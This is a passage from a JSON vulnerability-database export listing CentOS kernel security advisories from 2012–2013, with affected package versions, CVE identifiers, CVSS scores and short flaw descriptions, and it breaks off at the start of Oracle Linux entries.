"packageFilename": "kernel-debug-2.6.32-279.1.1.el6.x86_64.rpm", "packageName": "kernel-debug", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "packageFilename": "kernel-devel-2.6.32-279.1.1.el6.x86_64.rpm", "packageName": "kernel-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "packageFilename": "kernel-devel-2.6.32-279.1.1.el6.i686.rpm", "packageName": "kernel-devel", "arch": "i686", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "packageFilename": "kernel-debug-devel-2.6.32-279.1.1.el6.x86_64.rpm", "packageName": "kernel-debug-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "packageFilename": "kernel-debug-2.6.32-279.1.1.el6.i686.rpm", "packageName": "kernel-debug", "arch": "i686", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "packageFilename": "perf-2.6.32-279.1.1.el6.x86_64.rpm", "packageName": "perf", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "packageFilename": "python-perf-2.6.32-279.1.1.el6.x86_64.rpm", "packageName": "python-perf", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "packageFilename": "kernel-debug-devel-2.6.32-279.1.1.el6.i686.rpm", "packageName": "kernel-debug-devel", "arch": "i686", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "packageFilename": "kernel-2.6.32-279.1.1.el6.src.rpm", "packageName": "kernel", "arch": "any", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "packageFilename": "kernel-2.6.32-279.1.1.el6.x86_64.rpm", "packageName": "kernel", "arch": "x86_64", "operator": "lt"}], "description": "**CentOS Errata and Security Advisory** CESA-2012:1064\n\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issues:\n\n* A NULL pointer dereference flaw was found in the nf_ct_frag6_reasm()\nfunction in the Linux kernel's netfilter IPv6 connection tracking\nimplementation. A remote attacker could use this flaw to send\nspecially-crafted packets to a target system that is using IPv6 and also\nhas the nf_conntrack_ipv6 kernel module loaded, causing it to crash.\n(CVE-2012-2744, Important)\n\n* A flaw was found in the way the Linux kernel's key management facility\nhandled replacement session keyrings on process forks. A local,\nunprivileged user could use this flaw to cause a denial of service.\n(CVE-2012-2745, Moderate)\n\nRed Hat would like to thank an anonymous contributor working with the\nBeyond Security SecuriTeam Secure Disclosure program for reporting\nCVE-2012-2744.\n\nThis update also fixes the following bugs:\n\n* Previously introduced firmware files required for new Realtek chipsets\ncontained an invalid prefix (\"rtl_nic_\") in the file names, for example\n\"/lib/firmware/rtl_nic/rtl_nic_rtl8168d-1.fw\". This update corrects these\nfile names. For example, the aforementioned file is now correctly named\n\"/lib/firmware/rtl_nic/rtl8168d-1.fw\". (BZ#832359)\n\n* This update blacklists the ADMA428M revision of the 2GB ATA Flash Disk\ndevice. This is due to data corruption occurring on the said device when\nthe Ultra-DMA 66 transfer mode is used. When the\n\"libata.force=5:pio0,6:pio0\" kernel parameter is set, the aforementioned\ndevice works as expected. (BZ#832363)\n\n* On Red Hat Enterprise Linux 6, mounting an NFS export from a Windows 2012\nserver failed due to the fact that the Windows server contains support for\nthe minor version 1 (v4.1) of the NFS version 4 protocol only, along with\nsupport for versions 2 and 3. The lack of the minor version 0 (v4.0)\nsupport caused Red Hat Enterprise Linux 6 clients to fail instead of\nrolling back to version 3 as expected. This update fixes this bug and\nmounting an NFS export works as expected. (BZ#832365)\n\n* On ext4 file systems, when fallocate() failed to allocate blocks due to\nthe ENOSPC condition (no space left on device) for a file larger than 4 GB,\nthe size of the file became corrupted and, consequently, caused file system\ncorruption. This was due to a missing cast operator in the\n\"ext4_fallocate()\" function. With this update, the underlying source code\nhas been modified to address this issue, and file system corruption no\nlonger occurs. (BZ#833034)\n\nUsers should upgrade to these updated packages, which contain backported\npatches to correct these issues. The system must be rebooted for this\nupdate to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2012-July/018731.html\n\n**Affected packages:**\nkernel\nkernel-debug\nkernel-debug-devel\nkernel-devel\nkernel-doc\nkernel-firmware\nkernel-headers\nperf\npython-perf\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2012-1064.html", "edition": 1, "reporter": "CentOS Project", "published": "2012-07-10T13:40:45", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "title": "kernel, perf, python security update", "type": "centos", "bulletinFamily": "unix", "cvelist": ["CVE-2012-2745", "CVE-2012-2744"], "modified": "2012-07-10T13:40:45", "href": "http://lists.centos.org/pipermail/centos-announce/2012-July/018731.html", "id": "CESA-2012:1064", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-10-03T18:24:38", "references": ["https://rhn.redhat.com/errata/RHSA-2013-1292.html"], "affectedPackage": [{"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.18-348.18.1.el5", "arch": "x86_64", "packageName": "kernel-debug", "packageFilename": "kernel-debug-2.6.18-348.18.1.el5.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.18-348.18.1.el5", "arch": "i686", "packageName": "kernel-debug", "packageFilename": "kernel-debug-2.6.18-348.18.1.el5.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.18-348.18.1.el5", "arch": "noarch", "packageName": "kernel-doc", "packageFilename": "kernel-doc-2.6.18-348.18.1.el5.noarch.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.18-348.18.1.el5", "arch": "noarch", "packageName": "kernel-doc", "packageFilename": "kernel-doc-2.6.18-348.18.1.el5.noarch.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.18-348.18.1.el5", "arch": "i686", "packageName": "kernel-debug-devel", "packageFilename": "kernel-debug-devel-2.6.18-348.18.1.el5.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.18-348.18.1.el5", "arch": "x86_64", "packageName": "kernel-debug-devel", "packageFilename": "kernel-debug-devel-2.6.18-348.18.1.el5.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.18-348.18.1.el5", "arch": "x86_64", "packageName": "kernel-xen", "packageFilename": "kernel-xen-2.6.18-348.18.1.el5.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.18-348.18.1.el5", "arch": "i686", "packageName": "kernel", "packageFilename": "kernel-2.6.18-348.18.1.el5.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.18-348.18.1.el5", "arch": "i386", "packageName": "kernel-headers", "packageFilename": "kernel-headers-2.6.18-348.18.1.el5.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.18-348.18.1.el5", "arch": "x86_64", "packageName": "kernel-xen-devel", "packageFilename": "kernel-xen-devel-2.6.18-348.18.1.el5.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.18-348.18.1.el5", "arch": "x86_64", "packageName": "kernel-devel", "packageFilename": "kernel-devel-2.6.18-348.18.1.el5.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.18-348.18.1.el5", "arch": "x86_64", "packageName": "kernel-headers", "packageFilename": "kernel-headers-2.6.18-348.18.1.el5.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.18-348.18.1.el5", "arch": "i686", "packageName": "kernel-PAE-devel", "packageFilename": "kernel-PAE-devel-2.6.18-348.18.1.el5.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.18-348.18.1.el5", "arch": "i686", "packageName": "kernel-xen", "packageFilename": "kernel-xen-2.6.18-348.18.1.el5.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.18-348.18.1.el5", "arch": "any", "packageName": "kernel", "packageFilename": "kernel-2.6.18-348.18.1.el5.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.18-348.18.1.el5", "arch": "i686", "packageName": "kernel-devel", "packageFilename": "kernel-devel-2.6.18-348.18.1.el5.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.18-348.18.1.el5", "arch": "i686", "packageName": "kernel-xen-devel", "packageFilename": "kernel-xen-devel-2.6.18-348.18.1.el5.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.18-348.18.1.el5", "arch": "i686", "packageName": "kernel-PAE", "packageFilename": "kernel-PAE-2.6.18-348.18.1.el5.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.18-348.18.1.el5", "arch": "x86_64", "packageName": "kernel", "packageFilename": "kernel-2.6.18-348.18.1.el5.x86_64.rpm", "operator": "lt"}], "description": "**CentOS Errata and Security Advisory** CESA-2013:1292\n\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issues:\n\n* A use-after-free flaw was found in the madvise() system call\nimplementation in the Linux kernel. A local, unprivileged user could use\nthis flaw to cause a denial of service or, potentially, escalate their\nprivileges. (CVE-2012-3511, Moderate)\n\n* A flaw was found in the way the Linux kernel's TCP/IP protocol suite\nimplementation handled IPv6 sockets that used the UDP_CORK option. A local,\nunprivileged user could use this flaw to cause a denial of service.\n(CVE-2013-4162, Moderate)\n\n* An information leak flaw in the Linux kernel could allow a local,\nunprivileged user to leak kernel memory to user-space. (CVE-2013-2141, Low)\n\nRed Hat would like to thank Hannes Frederic Sowa for reporting\nCVE-2013-4162.\n\nThis update also fixes the following bugs:\n\n* A bug in the be2net driver prevented communication between NICs using\nbe2net. This update applies a patch addressing this problem along with\nseveral other upstream patches that fix various other problems. Traffic\nbetween NICs using the be2net driver now proceeds as expected. (BZ#983864)\n\n* A recent patch fixing a problem that prevented communication between\nNICs using the be2net driver caused the firmware of NICs to become\nunresponsive, and thus triggered a kernel panic. The problem was caused by\nunnecessary usage of a hardware workaround that allows skipping VLAN tag\ninsertion. A patch has been applied and the workaround is now used only\nwhen the multi-channel configuration is enabled on the NIC. Note that the\nbug only affected the NICs with firmware version 4.2.xxxx. (BZ#999819)\n\n* A bug in the autofs4 mount expiration code could cause the autofs4\nmodule to falsely report a busy tree of NFS mounts as \"not in use\".\nConsequently, automount attempted to unmount the tree and failed with\na \"failed to umount offset\" error, leaving the mount tree to appear as\nempty directories. A patch has been applied to remove an incorrectly used\nautofs dentry mount check and the aforementioned problem no longer occurs.\n(BZ#1001488)\n\n* A race condition in the be_open function in the be2net driver could\ntrigger the BUG_ON() macro, which resulted in a kernel panic. A patch\naddressing this problem has been applied and the race condition is now\navoided by enabling polling before enabling interrupts globally. The\nkernel no longer panics in this situation. (BZ#1005239)\n\nAll kernel users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. The system must be\nrebooted for this update to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2013-September/019961.html\n\n**Affected packages:**\nkernel\nkernel-PAE\nkernel-PAE-devel\nkernel-debug\nkernel-debug-devel\nkernel-devel\nkernel-doc\nkernel-headers\nkernel-xen\nkernel-xen-devel\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2013-1292.html", "edition": 1, "reporter": "CentOS Project", "published": "2013-09-27T13:27:33", "title": "kernel security update", "type": "centos", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2013-2141", "CVE-2012-3511", "CVE-2013-4162"], "modified": "2013-09-27T13:27:33", "href": "http://lists.centos.org/pipermail/centos-announce/2013-September/019961.html", "id": "CESA-2013:1292", "cvss": {"score": 6.2, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-10-03T18:25:54", "references": ["https://rhn.redhat.com/errata/RHSA-2012-1304.html"], "affectedPackage": [{"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-279.9.1.el6", "packageFilename": "kernel-devel-2.6.32-279.9.1.el6.x86_64.rpm", "packageName": "kernel-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-279.9.1.el6", "packageFilename": "kernel-2.6.32-279.9.1.el6.x86_64.rpm", "packageName": "kernel", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-279.9.1.el6", "packageFilename": "python-perf-2.6.32-279.9.1.el6.i686.rpm", "packageName": "python-perf", "arch": "i686", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-279.9.1.el6", "packageFilename": "kernel-debug-devel-2.6.32-279.9.1.el6.x86_64.rpm", "packageName": "kernel-debug-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-279.9.1.el6", "packageFilename": "kernel-debug-2.6.32-279.9.1.el6.x86_64.rpm", "packageName": "kernel-debug", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-279.9.1.el6", "packageFilename": "kernel-headers-2.6.32-279.9.1.el6.x86_64.rpm", "packageName": "kernel-headers", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-279.9.1.el6", "packageFilename": "perf-2.6.32-279.9.1.el6.i686.rpm", "packageName": "perf", "arch": "i686", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-279.9.1.el6", "packageFilename": "kernel-2.6.32-279.9.1.el6.src.rpm", "packageName": "kernel", "arch": "any", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-279.9.1.el6", "packageFilename": "kernel-2.6.32-279.9.1.el6.i686.rpm", "packageName": "kernel", "arch": "i686", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-279.9.1.el6", "packageFilename": "kernel-debug-2.6.32-279.9.1.el6.i686.rpm", "packageName": "kernel-debug", "arch": "i686", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-279.9.1.el6", "packageFilename": "perf-2.6.32-279.9.1.el6.x86_64.rpm", "packageName": "perf", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-279.9.1.el6", "packageFilename": "kernel-firmware-2.6.32-279.9.1.el6.noarch.rpm", "packageName": "kernel-firmware", "arch": "noarch", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-279.9.1.el6", "packageFilename": "kernel-firmware-2.6.32-279.9.1.el6.noarch.rpm", "packageName": "kernel-firmware", "arch": "noarch", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-279.9.1.el6", "packageFilename": "python-perf-2.6.32-279.9.1.el6.x86_64.rpm", "packageName": "python-perf", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-279.9.1.el6", "packageFilename": "kernel-debug-devel-2.6.32-279.9.1.el6.i686.rpm", "packageName": "kernel-debug-devel", "arch": "i686", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-279.9.1.el6", "packageFilename": "kernel-headers-2.6.32-279.9.1.el6.i686.rpm", "packageName": "kernel-headers", "arch": "i686", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-279.9.1.el6", "packageFilename": "kernel-doc-2.6.32-279.9.1.el6.noarch.rpm", "packageName": "kernel-doc", "arch": "noarch", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-279.9.1.el6", "packageFilename": "kernel-doc-2.6.32-279.9.1.el6.noarch.rpm", "packageName": "kernel-doc", "arch": "noarch", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-279.9.1.el6", "packageFilename": "kernel-devel-2.6.32-279.9.1.el6.i686.rpm", "packageName": "kernel-devel", "arch": "i686", "operator": "lt"}], "description": "**CentOS Errata and Security Advisory** CESA-2012:1304\n\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issues:\n\n* An integer overflow flaw was found in the i915_gem_do_execbuffer()\nfunction in the Intel i915 driver in the Linux kernel. A local,\nunprivileged user could use this flaw to cause a denial of service. This\nissue only affected 32-bit systems. (CVE-2012-2384, Moderate)\n\n* A memory leak flaw was found in the way the Linux kernel's memory\nsubsystem handled resource clean up in the mmap() failure path when the\nMAP_HUGETLB flag was set. A local, unprivileged user could use this flaw to\ncause a denial of service. (CVE-2012-2390, Moderate)\n\n* A race condition was found in the way access to inet->opt ip_options was\nsynchronized in the Linux kernel's TCP/IP protocol suite implementation.\nDepending on the network facing applications running on the system, a\nremote attacker could possibly trigger this flaw to cause a denial of\nservice. A local, unprivileged user could use this flaw to cause a denial\nof service regardless of the applications the system runs. (CVE-2012-3552,\nModerate)\n\n* A flaw was found in the way the Linux kernel's dl2k driver, used by\ncertain D-Link Gigabit Ethernet adapters, restricted IOCTLs. A local,\nunprivileged user could use this flaw to issue potentially harmful IOCTLs,\nwhich could cause Ethernet adapters using the dl2k driver to malfunction\n(for example, losing network connectivity). (CVE-2012-2313, Low)\n\n* A flaw was found in the way the msg_namelen variable in the rds_recvmsg()\nfunction of the Linux kernel's Reliable Datagram Sockets (RDS) protocol\nimplementation was initialized. A local, unprivileged user could use this\nflaw to leak kernel stack memory to user-space. (CVE-2012-3430, Low)\n\nRed Hat would like to thank Hafid Lin for reporting CVE-2012-3552, and\nStephan Mueller for reporting CVE-2012-2313. The CVE-2012-3430 issue was\ndiscovered by the Red Hat InfiniBand team.\n\nThis update also fixes several bugs. Documentation for these changes will\nbe available shortly from the Technical Notes document linked to in the\nReferences section.\n\nUsers should upgrade to these updated packages, which contain backported\npatches to correct these issues, and fix the bugs noted in the Technical\nNotes. The system must be rebooted for this update to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2012-September/018901.html\n\n**Affected packages:**\nkernel\nkernel-debug\nkernel-debug-devel\nkernel-devel\nkernel-doc\nkernel-firmware\nkernel-headers\nperf\npython-perf\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2012-1304.html", "edition": 1, "reporter": "CentOS Project", "published": "2012-09-25T21:59:30", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "title": "kernel, perf, python security update", "type": "centos", "bulletinFamily": "unix", "cvelist": ["CVE-2012-2390", "CVE-2012-2313", "CVE-2012-2384", "CVE-2012-3552", "CVE-2012-3430"], "modified": "2012-09-25T21:59:30", "href": "http://lists.centos.org/pipermail/centos-announce/2012-September/018901.html", "id": "CESA-2012:1304", "cvss": {"score": 5.4, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-10-03T18:26:58", "references": ["https://rhn.redhat.com/errata/RHSA-2012-1426.html"], "affectedPackage": [{"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-279.14.1.el6", "arch": "i686", "packageName": "kernel-headers", "packageFilename": "kernel-headers-2.6.32-279.14.1.el6.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-279.14.1.el6", "arch": "i686", "packageName": "kernel-debug", "packageFilename": "kernel-debug-2.6.32-279.14.1.el6.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-279.14.1.el6", "arch": "x86_64", "packageName": "kernel-headers", "packageFilename": "kernel-headers-2.6.32-279.14.1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-279.14.1.el6", "arch": "x86_64", "packageName": "python-perf", "packageFilename": "python-perf-2.6.32-279.14.1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-279.14.1.el6", "arch": "x86_64", "packageName": "kernel", "packageFilename": "kernel-2.6.32-279.14.1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-279.14.1.el6", "arch": "i686", "packageName": "python-perf", "packageFilename": "python-perf-2.6.32-279.14.1.el6.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-279.14.1.el6", "arch": "i686", "packageName": "kernel", "packageFilename": "kernel-2.6.32-279.14.1.el6.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-279.14.1.el6", "arch": "x86_64", "packageName": "perf", "packageFilename": "perf-2.6.32-279.14.1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-279.14.1.el6", "arch": "noarch", "packageName": "kernel-firmware", "packageFilename": "kernel-firmware-2.6.32-279.14.1.el6.noarch.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-279.14.1.el6", "arch": "noarch", "packageName": "kernel-firmware", "packageFilename": "kernel-firmware-2.6.32-279.14.1.el6.noarch.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-279.14.1.el6", "arch": "noarch", "packageName": "kernel-doc", "packageFilename": "kernel-doc-2.6.32-279.14.1.el6.noarch.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-279.14.1.el6", "arch": "noarch", "packageName": "kernel-doc", "packageFilename": "kernel-doc-2.6.32-279.14.1.el6.noarch.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-279.14.1.el6", "arch": "any", "packageName": "kernel", "packageFilename": "kernel-2.6.32-279.14.1.el6.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-279.14.1.el6", "arch": "i686", "packageName": "perf", "packageFilename": "perf-2.6.32-279.14.1.el6.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-279.14.1.el6", "arch": "x86_64", "packageName": "kernel-devel", "packageFilename": "kernel-devel-2.6.32-279.14.1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-279.14.1.el6", "arch": "i686", "packageName": "kernel-debug-devel", "packageFilename": "kernel-debug-devel-2.6.32-279.14.1.el6.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-279.14.1.el6", "arch": "x86_64", "packageName": "kernel-debug-devel", "packageFilename": "kernel-debug-devel-2.6.32-279.14.1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-279.14.1.el6", "arch": "x86_64", "packageName": "kernel-debug", "packageFilename": "kernel-debug-2.6.32-279.14.1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-279.14.1.el6", "arch": "i686", "packageName": "kernel-devel", "packageFilename": "kernel-devel-2.6.32-279.14.1.el6.i686.rpm", "operator": "lt"}], "description": "**CentOS Errata and Security Advisory** CESA-2012:1426\n\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issues:\n\n* A use-after-free flaw was found in the Linux kernel's memory management\nsubsystem in the way quota handling for huge pages was performed. A local,\nunprivileged user could use this flaw to cause a denial of service or,\npotentially, escalate their privileges. (CVE-2012-2133, Moderate)\n\n* A use-after-free flaw was found in the madvise() system call\nimplementation in the Linux kernel. A local, unprivileged user could use\nthis flaw to cause a denial of service or, potentially, escalate their\nprivileges. (CVE-2012-3511, Moderate)\n\n* It was found that when running a 32-bit binary that uses a large number\nof shared libraries, one of the libraries would always be loaded at a\npredictable address in memory. An attacker could use this flaw to bypass\nthe Address Space Layout Randomization (ASLR) security feature.\n(CVE-2012-1568, Low)\n\n* Buffer overflow flaws were found in the udf_load_logicalvol() function\nin the Universal Disk Format (UDF) file system implementation in the Linux\nkernel. An attacker with physical access to a system could use these flaws\nto cause a denial of service or escalate their privileges. (CVE-2012-3400,\nLow)\n\nRed Hat would like to thank Shachar Raindel for reporting CVE-2012-2133.\n\nThis update also fixes several bugs. Documentation for these changes will\nbe available shortly from the Technical Notes document linked to in the\nReferences section.\n\nUsers should upgrade to these updated packages, which contain backported\npatches to correct these issues, and fix the bugs noted in the Technical\nNotes. The system must be rebooted for this update to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2012-November/018974.html\n\n**Affected packages:**\nkernel\nkernel-debug\nkernel-debug-devel\nkernel-devel\nkernel-doc\nkernel-firmware\nkernel-headers\nperf\npython-perf\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2012-1426.html", "edition": 1, "reporter": "CentOS Project", "published": "2012-11-07T12:15:29", "title": "kernel, perf, python security update", "type": "centos", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2012-2133", "CVE-2012-3511", "CVE-2012-1568", "CVE-2012-3400"], "modified": "2012-11-07T12:15:29", "href": "http://lists.centos.org/pipermail/centos-announce/2012-November/018974.html", "id": "CESA-2012:1426", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "oraclelinux": [{"lastseen": "2018-08-31T01:43:14", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "ia64", "packageFilename": "kernel-debug-devel-2.6.18-308.16.1.el5.ia64.rpm", "packageName": "kernel-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "i686", "packageFilename": "kernel-devel-2.6.18-308.16.1.el5.i686.rpm", "packageName": "kernel-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.4.10-1.el5", "arch": "ia64", "packageFilename": "ocfs2-2.6.18-308.16.1.el5-1.4.10-1.el5.ia64.rpm", "packageName": "ocfs2-2.6.18-308.16.1.el5", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "i686", "packageFilename": "kernel-debug-devel-2.6.18-308.16.1.el5.i686.rpm", "packageName": "kernel-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.5-1.el5", "arch": "ia64", "packageFilename": "oracleasm-2.6.18-308.16.1.el5debug-2.0.5-1.el5.ia64.rpm", "packageName": "oracleasm-2.6.18-308.16.1.el5debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "ia64", "packageFilename": "kernel-devel-2.6.18-308.16.1.el5.ia64.rpm", "packageName": "kernel-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "src", "packageFilename": "kernel-2.6.18-308.16.1.el5.src.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "src", "packageFilename": "kernel-2.6.18-308.16.1.el5.src.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "src", "packageFilename": "kernel-2.6.18-308.16.1.el5.src.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.5-1.el5", "arch": "ia64", "packageFilename": "oracleasm-2.6.18-308.16.1.el5xen-2.0.5-1.el5.ia64.rpm", "packageName": "oracleasm-2.6.18-308.16.1.el5xen", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "ia64", "packageFilename": "kernel-headers-2.6.18-308.16.1.el5.ia64.rpm", "packageName": "kernel-headers", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "noarch", "packageFilename": "kernel-doc-2.6.18-308.16.1.el5.noarch.rpm", "packageName": "kernel-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "noarch", "packageFilename": 